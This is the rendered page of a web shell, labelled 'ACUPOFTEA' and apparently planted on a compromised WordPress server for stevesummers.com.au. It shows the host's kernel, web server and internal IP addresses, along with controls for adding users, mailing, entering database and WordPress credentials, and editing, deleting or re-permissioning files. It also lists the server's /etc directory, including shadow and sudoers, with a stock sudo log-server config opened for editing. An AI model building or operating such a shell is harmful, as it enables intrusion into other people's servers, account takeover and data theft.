System
:
Linux wordpress 7.0.14-6-pve #1 SMP PREEMPT_DYNAMIC PMX 7.0.14-6 (2026-07-20T14:45Z) x86_64
Software
:
Apache/2.4.67 (Debian)
Server
:
192.168.20.30
Domains
:
Cant read /etc/named.conf
Permission
:
[
drwxr-xr-x
]
:
/
etc
/
192.168.10.18
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for stevesummers.com.au made by tabagkayu.
Folder Name
File Name
File Content
File
sudo_logsrvd.conf
# # sudo logsrv daemon configuration # [server] # The host name or IP address and port to listen on with an optional TLS # flag. If no port is specified, port 30343 will be used for plaintext # connections and port 30344 will be used to TLS connections. # The following forms are accepted: # listen_address = hostname(tls) # listen_address = hostname:port(tls) # listen_address = IPv4_address(tls) # listen_address = IPv4_address:port(tls) # listen_address = [IPv6_address](tls) # listen_address = [IPv6_address]:port(tls) # # The (tls) suffix should be omitted for plaintext connections. # # Multiple listen_address settings may be specified. # The default is to listen on all addresses. #listen_address = *:30343 #listen_address = *:30344(tls) # The file containing the ID of the running sudo_logsrvd process. #pid_file = /run/sudo/sudo_logsrvd.pid # Where to log server warnings: none, stderr, syslog, or a path name. #server_log = syslog # If true, enable the SO_KEEPALIVE socket option on client connections. # Defaults to true. #tcp_keepalive = true # The amount of time, in seconds, the server will wait for the client to # respond. A value of 0 will disable the timeout. The default value is 30. #timeout = 30 # If true, the server will validate its own certificate at startup. # Defaults to true. #tls_verify = true # If true, client certificates will be validated by the server; # clients without a valid certificate will be unable to connect. # By default, client certs are not checked. #tls_checkpeer = false # Path to a certificate authority bundle file in PEM format to use # instead of the system's default certificate authority database. #tls_cacert = /etc/ssl/sudo/cacert.pem # Path to the server's certificate file in PEM format. # Required for TLS connections. #tls_cert = /etc/ssl/sudo/certs/logsrvd_cert.pem # Path to the server's private key file in PEM format. # Required for TLS connections. #tls_key = /etc/ssl/sudo/private/logsrvd_key.pem # TLS cipher list (see "CIPHER LIST FORMAT" in the openssl-ciphers manual). # This setting is only effective if the negotiated protocol is TLS version # 1.2. The default cipher list is HIGH:!aNULL. #tls_ciphers_v12 = HIGH:!aNULL # TLS cipher list if the negotiated protocol is TLS version 1.3. # The default cipher list is TLS_AES_256_GCM_SHA384. #tls_ciphers_v13 = TLS_AES_256_GCM_SHA384 # Path to the Diffie-Hellman parameter file in PEM format. # If not set, the server will use the OpenSSL defaults. #tls_dhparams = /etc/ssl/sudo/logsrvd_dhparams.pem [relay] # The host name or IP address and port to send logs to in relay mode. # The syntax is identical to listen_address with the exception of # the wild card ('*') syntax. When this setting is enabled, logs will # be relayed to the specified host instead of being stored locally. # This setting is not enabled by default. #relay_host = relayhost.dom.ain #relay_host = relayhost.dom.ain(tls) # The amount of time, in seconds, the server will wait for a connection # to the relay server to complete. A value of 0 will disable the timeout. # The default value is 30. #connect_timeout = 30 # The directory to store messages in before they are sent to the relay. # Messages are stored in wire format. # The default value is /var/log/sudo_logsrvd. #relay_dir = /var/log/sudo_logsrvd # The number of seconds to wait after a connection error before # making a new attempt to forward a message to a relay host. # The default value is 30. #retry_interval = 30 # Whether to store the log before relaying it. If true, enable store # and forward mode. If false, the client connection is immediately # relayed. Defaults to false. #store_first = true # If true, enable the SO_KEEPALIVE socket option on relay connections. # Defaults to true. #tcp_keepalive = true # The amount of time, in seconds, the server will wait for the relay to # respond. A value of 0 will disable the timeout. The default value is 30. #timeout = 30 # If true, the server's relay certificate will be verified at startup. # The default is to use the value in the [server] section. #tls_verify = true # Whether to verify the relay's certificate for TLS connections. # The default is to use the value in the [server] section. #tls_checkpeer = false # Path to a certificate authority bundle file in PEM format to use # instead of the system's default certificate authority database. # The default is to use the value in the [server] section. #tls_cacert = /etc/ssl/sudo/cacert.pem # Path to the server's certificate file in PEM format. # The default is to use the certificate in the [server] section. #tls_cert = /etc/ssl/sudo/certs/logsrvd_cert.pem # Path to the server's private key file in PEM format. # The default is to use the key in the [server] section. #tls_key = /etc/ssl/sudo/private/logsrvd_key.pem # TLS cipher list (see "CIPHER LIST FORMAT" in the openssl-ciphers manual). # this setting is only effective if the negotiated protocol is TLS version # 1.2. The default is to use the value in the [server] section. #tls_ciphers_v12 = HIGH:!aNULL # TLS cipher list if the negotiated protocol is TLS version 1.3. # The default is to use the value in the [server] section. #tls_ciphers_v13 = TLS_AES_256_GCM_SHA384 # Path to the Diffie-Hellman parameter file in PEM format. # The default is to use the value in the [server] section. #tls_dhparams = /etc/ssl/sudo/logsrvd_dhparams.pem [iolog] # The top-level directory to use when constructing the path name for the # I/O log directory. The session sequence number, if any, is stored here. #iolog_dir = /var/log/sudo-io # The path name, relative to iolog_dir, in which to store I/O logs. # It is possible for iolog_file to contain directory components. #iolog_file = %{seq} # If set, I/O logs will be compressed using zlib. Enabling compression can # make it harder to view the logs in real-time as the program is executing. #iolog_compress = false # If set, I/O log data is flushed to disk after each write instead of # buffering it. This makes it possible to view the logs in real-time # as the program is executing but reduces the effectiveness of compression. #iolog_flush = true # The group to use when creating new I/O log files and directories. # If iolog_group is not set, the primary group-ID of the user specified # by iolog_user is used. If neither iolog_group nor iolog_user # are set, I/O log files and directories are created with group-ID 0. #iolog_group = wheel # The user to use when setting the user-ID and group-ID of new I/O # log files and directories. If iolog_group is set, it will be used # instead of the user's primary group-ID. By default, I/O log files # and directories are created with user and group-ID 0. #iolog_user = root # The file mode to use when creating I/O log files. The file permissions # will always include the owner read and write bits, even if they are # not present in the specified mode. When creating I/O log directories, # search (execute) bits are added to match the read and write bits # specified by iolog_mode. #iolog_mode = 0600 # If disabled, sudo_logsrvd will attempt to avoid logging plaintext # password in the terminal input using passprompt_regex. #log_passwords = true # The maximum sequence number that will be substituted for the "%{seq}" # escape in the I/O log file. While the value substituted for "%{seq}" # is in base 36, maxseq itself should be expressed in decimal. Values # larger than 2176782336 (which corresponds to the base 36 sequence # number "ZZZZZZ") will be silently truncated to 2176782336. #maxseq = 2176782336 # One or more POSIX extended regular expressions used to match # password prompts in the terminal output when log_passwords is # disabled. Multiple passprompt_regex settings may be specified. #passprompt_regex = [Pp]assword[: ]* #passprompt_regex = [Pp]assword for [a-z0-9]+: * [eventlog] # Where to log accept, reject, exit, and alert events. # Accepted values are syslog, logfile, or none. # Defaults to syslog #log_type = syslog # Whether to log an event when a command exits or is terminated by a signal. # Defaults to false #log_exit = true # Event log format. # Supported log formats are "sudo" and "json" # Defaults to sudo #log_format = sudo [syslog] # The maximum length of a syslog payload. # On many systems, syslog(3) has a relatively small log buffer. # IETF RFC 5424 states that syslog servers must support messages # of at least 480 bytes and should support messages up to 2048 bytes. # Messages larger than this value will be split into multiple messages. #maxlen = 960 # The syslog facility to use for event log messages. # The following syslog facilities are supported: authpriv (if your OS # supports it), auth, daemon, user, local0, local1, local2, local3, # local4, local5, local6, and local7. #facility = authpriv # Syslog priority to use for event log accept messages, when the command # is allowed by the security policy. The following syslog priorities are # supported: alert, crit, debug, emerg, err, info, notice, warning, none. #accept_priority = notice # Syslog priority to use for event log reject messages, when the command # is not allowed by the security policy. #reject_priority = alert # Syslog priority to use for event log alert messages reported by the # client. #alert_priority = alert # The syslog facility to use for server warning messages. # Defaults to daemon. #server_facility = daemon [logfile] # The path to the file-based event log. # This path must be fully-qualified and start with a '/' character. #path = /var/log/sudo.log # The format string used when formatting the date and time for # file-based event logs. Formatting is performed via strftime(3) so # any format string supported by that function is allowed. #time_format = %h %e %T
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2026-08-10 12:08:46
..
DIR
-
drwxr-xr-x
2026-08-10 12:08:54
ImageMagick-7
DIR
-
drwxr-xr-x
2026-06-18 12:24:44
X11
DIR
-
drwxr-xr-x
2026-06-18 12:24:46
alternatives
DIR
-
drwxr-xr-x
2026-06-18 12:54:21
apache2
DIR
-
drwxr-xr-x
2026-06-18 12:23:38
apparmor.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:26
apt
DIR
-
drwxr-xr-x
2025-10-01 02:44:13
avahi
DIR
-
drwxr-xr-x
2026-06-18 12:54:40
bash_completion.d
DIR
-
drwxr-xr-x
2025-10-01 02:44:08
binfmt.d
DIR
-
drwxr-xr-x
2025-09-09 08:38:33
ca-certificates
DIR
-
drwxr-xr-x
2025-10-01 02:44:02
credstore
DIR
-
drwx------
2025-09-09 08:38:33
credstore.encrypted
DIR
-
drwx------
2025-09-09 08:38:33
cron.d
DIR
-
drwxr-xr-x
2026-06-18 12:23:54
cron.daily
DIR
-
drwxr-xr-x
2026-06-18 12:23:38
cron.hourly
DIR
-
drwxr-xr-x
2025-10-01 02:43:45
cron.monthly
DIR
-
drwxr-xr-x
2025-10-01 02:43:45
cron.weekly
DIR
-
drwxr-xr-x
2025-10-01 02:44:12
cron.yearly
DIR
-
drwxr-xr-x
2025-10-01 02:43:45
dbconfig-common
DIR
-
drwxr-xr-x
2026-06-18 12:54:38
dbus-1
DIR
-
drwxr-xr-x
2025-10-01 02:44:01
default
DIR
-
drwxr-xr-x
2026-06-18 12:25:25
depmod.d
DIR
-
drwxr-xr-x
2025-04-25 09:50:41
dhcp
DIR
-
drwxr-xr-x
2025-10-01 02:44:17
dpkg
DIR
-
drwxr-xr-x
2026-06-18 12:22:39
fonts
DIR
-
drwxr-xr-x
2026-06-18 12:25:04
ghostscript
DIR
-
drwxr-xr-x
2026-06-18 12:24:34
groff
DIR
-
drwxr-xr-x
2025-10-01 02:44:11
gss
DIR
-
drwxr-xr-x
2025-10-01 02:43:42
init.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:26
insserv.conf.d
DIR
-
drwxr-xr-x
2026-06-18 12:23:04
kernel
DIR
-
drwxr-xr-x
2025-09-09 08:38:33
ld.so.conf.d
DIR
-
drwxr-xr-x
2026-06-18 12:22:40
ldap
DIR
-
drwxr-xr-x
2026-06-18 12:22:11
lighttpd
DIR
-
drwxr-xr-x
2026-06-18 12:54:07
logcheck
DIR
-
drwxr-xr-x
2026-06-18 12:25:21
logrotate.d
DIR
-
drwxr-xr-x
2026-06-18 12:54:07
mc
DIR
-
drwxr-xr-x
2026-06-18 12:22:19
modprobe.d
DIR
-
drwxr-xr-x
2025-04-25 09:50:41
modules-load.d
DIR
-
drwxr-xr-x
2026-06-18 12:22:43
mysql
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
network
DIR
-
drwxr-xr-x
2026-08-10 12:08:46
opt
DIR
-
drwxr-xr-x
2025-10-01 02:43:15
pam.d
DIR
-
drwxr-xr-x
2026-06-18 12:23:12
perl
DIR
-
drwxr-xr-x
2025-10-01 02:43:57
php
DIR
-
drwxr-xr-x
2026-06-18 12:53:57
phpmyadmin
DIR
-
drwxr-xr-x
2026-06-18 12:54:38
postfix
DIR
-
drwxr-xr-x
2026-06-18 12:23:04
ppp
DIR
-
drwxr-xr-x
2025-10-01 02:43:39
profile.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:49
python3
DIR
-
drwxr-xr-x
2025-10-01 02:44:10
python3.13
DIR
-
drwxr-xr-x
2026-06-18 12:23:01
rc0.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
rc1.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
rc2.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
rc3.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
rc4.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
rc5.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
rc6.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:29
rcS.d
DIR
-
drwxr-xr-x
2026-06-18 12:24:46
resolvconf
DIR
-
drwxr-xr-x
2025-10-01 02:43:39
rsyslog.d
DIR
-
drwxr-xr-x
2026-06-18 12:23:04
runit
DIR
-
drwxr-xr-x
2025-10-01 02:43:41
security
DIR
-
drwxr-xr-x
2026-06-18 12:25:26
selinux
DIR
-
drwxr-xr-x
2025-10-01 02:43:29
sensors.d
DIR
-
drwxr-xr-x
2026-06-18 12:24:47
skel
DIR
-
drwxr-xr-x
2026-06-18 12:22:38
snmp
DIR
-
drwxr-xr-x
2026-06-18 12:24:44
ssh
DIR
-
drwxr-xr-x
2026-06-18 12:23:12
ssl
DIR
-
drwxr-xr-x
2026-06-18 12:23:07
sudoers.d
DIR
-
drwxr-xr-x
2026-06-18 12:22:12
supercat
DIR
-
drwxr-xr-x
2025-10-01 02:43:45
sv
DIR
-
drwxr-xr-x
2025-10-01 02:43:41
sysctl.d
DIR
-
drwxr-xr-x
2025-10-01 02:43:44
systemd
DIR
-
drwxr-xr-x
2026-06-18 12:23:01
terminfo
DIR
-
drwxr-xr-x
2025-10-01 02:43:29
tmpfiles.d
DIR
-
drwxr-xr-x
2026-06-18 12:25:33
udev
DIR
-
drwxr-xr-x
2026-06-18 12:23:02
ufw
DIR
-
drwxr-xr-x
2025-10-01 02:43:39
update-motd.d
DIR
-
drwxr-xr-x
2026-06-18 12:22:38
vim
DIR
-
drwxr-xr-x
2025-10-01 02:43:45
xdg
DIR
-
drwxr-xr-x
2026-06-18 12:22:11
.pwd.lock
0 B
-rw-------
2025-10-01 02:43:31
.updated
text/plain
208 B
-rw-r--r--
2025-10-01 02:43:15
adduser.conf
text/plain
3.89 KB
-rw-r--r--
2025-05-06 06:25:46
aliases
text/plain
33 B
-rw-r--r--
2025-10-01 02:43:32
aliases.db
application/octet-stream
12 KB
-rw-r--r--
2025-10-01 02:43:53
appliance.info
text/plain
363 B
-rw-r--r--
2025-10-01 02:44:26
bash.bashrc
text/plain
1.95 KB
-rw-r--r--
2025-07-30 07:28:56
bash_completion
text/plain
45 B
-rw-r--r--
2025-01-12 04:10:41
bindresvport.blacklist
text/plain
367 B
-rw-r--r--
2025-07-26 06:40:07
ca-certificates.conf
text/plain
6.27 KB
-rw-r--r--
2025-10-01 02:44:10
crontab
text/plain
1.02 KB
-rw-r--r--
2026-06-18 12:21:21
debconf.conf
text/plain
2.9 KB
-rw-r--r--
2025-03-10 12:07:15
debian_version
text/plain
5 B
-rw-r--r--
2026-05-08 04:10:00
deluser.conf
text/plain
1.67 KB
-rw-r--r--
2025-05-06 06:25:46
dhcpcd.conf
text/plain
1.24 KB
-rw-r--r--
2025-12-25 09:40:14
e2scrub.conf
text/plain
685 B
-rw-r--r--
2025-07-30 07:39:44
environment
application/x-empty
0 B
-rw-r--r--
2025-10-01 02:43:31
ethertypes
text/plain
1.89 KB
-rw-r--r--
2025-03-15 11:20:10
fstab
text/plain
37 B
-rw-r--r--
2025-10-01 02:43:14
gai.conf
text/plain
2.52 KB
-rw-r--r--
2025-01-28 05:31:33
group
text/plain
685 B
-rw-r--r--
2026-06-18 12:25:21
group-
text/plain
672 B
-rw-r--r--
2026-06-18 12:23:37
gshadow
577 B
-rw-r-----
2026-06-18 12:25:21
gshadow-
567 B
-rw-r-----
2026-06-18 12:23:37
host.conf
text/plain
9 B
-rw-r--r--
2025-08-24 04:20:00
hostname
text/plain
10 B
-rw-r--r--
2026-08-10 12:08:46
hosts
text/plain
186 B
-rw-r--r--
2026-08-10 12:08:46
hosts.allow
text/plain
411 B
-rw-r--r--
2025-10-01 02:43:44
hosts.deny
text/plain
711 B
-rw-r--r--
2025-10-01 02:43:44
inputrc
text/plain
1.83 KB
-rw-r--r--
2024-12-13 01:31:14
issue
text/plain
27 B
-rw-r--r--
2025-08-24 04:20:00
issue.net
text/plain
20 B
-rw-r--r--
2025-08-24 04:20:00
ld.so.cache
application/octet-stream
23.08 KB
-rw-r--r--
2026-06-18 12:54:40
ld.so.conf
text/plain
34 B
-rw-r--r--
2025-07-26 06:40:07
libaudit.conf
text/plain
191 B
-rw-r--r--
2024-11-14 09:10:09
locale.alias
text/plain
2.93 KB
-rw-r--r--
2025-08-05 05:34:49
locale.conf
text/plain
17 B
-rw-r--r--
2026-06-18 12:21:48
locale.gen
text/plain
9.34 KB
-rw-r--r--
2026-06-18 12:22:57
localtime
application/octet-stream
446 B
-rw-r--r--
2026-04-28 06:45:23
login.defs
text/plain
5.8 KB
-rw-r--r--
2025-04-19 10:20:28
logrotate.conf
text/plain
494 B
-rw-r--r--
2024-07-14 04:30:23
machine-id
text/plain
33 B
-r--r--r--
2026-06-18 12:21:34
magic
text/x-file
111 B
-rw-r--r--
2025-04-11 05:25:13
magic.mime
text/x-file
111 B
-rw-r--r--
2025-04-11 05:25:13
mailcap
text/plain
3.95 KB
-rw-r--r--
2026-06-18 12:25:08
mailcap.order
text/plain
449 B
-rw-r--r--
2024-11-11 11:56:25
manpath.config
text/plain
5.11 KB
-rw-r--r--
2025-05-02 01:24:27
mime.types
text/plain
76.45 KB
-rw-r--r--
2025-03-08 01:12:03
mke2fs.conf
text/plain
813 B
-rw-r--r--
2025-07-30 07:39:44
modules
text/plain
212 B
-rw-r--r--
2025-10-01 02:43:45
motd
text/plain
286 B
-rw-r--r--
2025-08-24 04:20:00
mtab
text/plain
0 B
-r--r--r--
2026-08-14 01:27:40
nanorc
text/plain
11.49 KB
-rw-r--r--
2025-04-06 02:11:30
netconfig
text/plain
767 B
-rw-r--r--
2025-03-18 12:04:32
networks
text/plain
60 B
-rw-r--r--
2025-10-01 02:43:44
nftables.conf
text/plain
243 B
-rwxr-xr-x
2025-06-10 06:12:35
nsswitch.conf
text/plain
526 B
-rw-r--r--
2025-10-01 02:44:07
os-release
text/plain
286 B
-rw-r--r--
2026-05-08 04:10:00
pam.conf
text/x-file
552 B
-rw-r--r--
2025-06-29 05:40:46
paperspecs
text/csv
1.28 KB
-rw-r--r--
2025-03-28 08:29:48
passwd
text/plain
1.27 KB
-rw-r--r--
2026-06-18 12:25:21
passwd-
text/plain
1.26 KB
-rw-r--r--
2026-06-18 12:25:21
profile
text/plain
828 B
-rw-r--r--
2025-08-24 04:20:00
protocols
text/plain
3.07 KB
-rw-r--r--
2022-10-17 10:19:05
reportbug.conf
text/plain
3.15 KB
-rw-r--r--
2025-02-19 06:31:22
resolv.conf
text/plain
76 B
-rw-r--r--
2026-08-10 12:08:46
rmt
application/x-pie-executable
63.19 KB
-rwxr-xr-x
2024-12-18 02:37:14
rpc
text/plain
911 B
-rw-r--r--
2022-10-17 10:24:22
sensors3.conf
text/plain
10.5 KB
-rw-r--r--
2025-04-12 12:35:33
services
text/plain
12.69 KB
-rw-r--r--
2025-03-15 10:55:22
shadow
648 B
-rw-r-----
2026-06-18 12:25:21
shadow-
628 B
-rw-r-----
2026-06-18 12:21:21
shells
text/plain
118 B
-rw-r--r--
2026-06-18 12:23:20
subgid
application/x-empty
0 B
-rw-r--r--
2025-10-01 02:43:15
subuid
application/x-empty
0 B
-rw-r--r--
2025-10-01 02:43:15
sudo.conf
text/plain
4.24 KB
-rw-r--r--
2026-04-11 12:21:02
sudo_logsrvd.conf
text/plain
9.57 KB
-rw-r--r--
2026-04-11 12:21:02
sudoers
1.67 KB
-r--r-----
2026-04-11 12:21:02
timezone
text/plain
16 B
-rw-r--r--
2026-08-10 12:08:46
ucf.conf
text/plain
1.23 KB
-rw-r--r--
2025-05-19 08:52:12
wgetrc
text/plain
4.83 KB
-rw-r--r--
2025-03-08 06:23:26
xattr.conf
text/plain
681 B
-rw-r--r--
2025-02-21 10:29:11
~ ACUPOFTEA - stevesummers.com.au